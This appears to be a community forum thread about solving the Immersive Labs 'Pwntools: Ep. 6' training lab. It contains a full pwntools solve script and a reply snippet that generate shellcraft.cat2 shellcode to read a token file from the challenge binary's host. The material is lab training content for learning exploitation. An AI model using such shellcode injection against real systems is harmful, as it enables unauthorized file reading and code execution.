Forum Discussion

kdkstudies's avatar
kdkstudies
Icon for Bronze I rankBronze I
3 months ago

Need Help for Pwntools: Ep. 6 — Demonstrate Your Skills

I'm trying to solve an lab in Immersive labs Pwntools: Ep. 6 — Demonstrate Your Skills And I got stuck in the last step. I've tried the solution for using cat2 (from https://www.reddit.com/r/immers...
application security
defensive cyber
immersive labs
IotS2024's avatar
IotS2024
Icon for Bronze III rankBronze III
2 months ago

I think there is some steps missing in your code. Go up take the provided code and make the adjustments in the replies and it should work.

talnet23's avatar
talnet23
Icon for Bronze I rankBronze I
2 months ago

Thanks for coming back to me, sorry I removed some of the steps for brevity but this is the full code that works fine locally but not though the remote connection:

from pwn import *
import re

context.arch = 'amd64'
context.os = 'linux'

def main():
    r_tube = process("/opt/demonstrate-challenge")
    #r_tube = remote("127.0.0.1", 1234)

    print("Stage 1")
    r_tube.recvuntil(b"What is the sum of")
    line = r_tube.recvline().decode()
    nums = [int(x) for x in line.strip().replace('?', '').split(' and ')]
    answer = nums[0] + nums[1]
    r_tube.sendline(str(answer).encode())

    print("Stage 2")
    r_tube.recvuntil(b':')
    r_tube.recvline()
    line = r_tube.recvline().decode().strip()
    val1, val2 = [int(x) for x in line.split(" and ")]
    packed = p32(val1) + p32(val2)
    r_tube.send(packed)

    print("Stage 3")
    elf = ELF('/opt/demonstrate-challenge')
    parsing_check_addr = elf.symbols['parsing_check']
    r_tube.sendline(str(parsing_check_addr))

    print("Stage 4")
    shellcode = shellcraft.cat2('/home/token-user/token.txt', 1, 40) + shellcraft.ret(0)
    shellcode = asm(shellcode)
    r_tube.send(shellcode)
    data = r_tube.recvall(5)
    print(hexdump(data))

if __name__ == "__main__":
    main()

Again I get a SegFault with this and copying the code above I get a SegFault too and both of which provide the token.txt locally but not through the remote connection.

  • IotS2024's avatar
    IotS2024
    Icon for Bronze III rankBronze III
    2 months ago

    Okay :) For me the following worked (just a part):

    # Generate shellcode to read the file using pwntools shellcraft
    context.arch = "amd64"
    
    # Generate shellcode using shellcraft to read file and print the content as hex
    shellcode = asm(shellcraft.cat2("/home/token-user/token.txt"))

    # Print out the shellcode in hexadecimal for easy inspection
    print("Generated Shellcode:")
    print(shellcode.hex())  # Print shellcode in hex format for debugging

    # Send the shellcode payload
    conn.sendline(shellcode)

    I tried a lot of different approaches until i found this one. try it out.

    It is the arch and an easier shellcode generation.

    • talnet23's avatar
      talnet23
      Icon for Bronze I rankBronze I
      2 months ago

      Ok my brain hurts! Running that code locally on my machine through Socat or through spawning a local process, nothing. However, when running it in the Immersive Lab environment, I get the token back. At least others have been able to work that out. Thanks completed PwnTools now.

  • netcat's avatar
    netcat
    Icon for Silver II rankSilver II
    2 months ago

    I had to use encode to get rid of tab, space and other characters.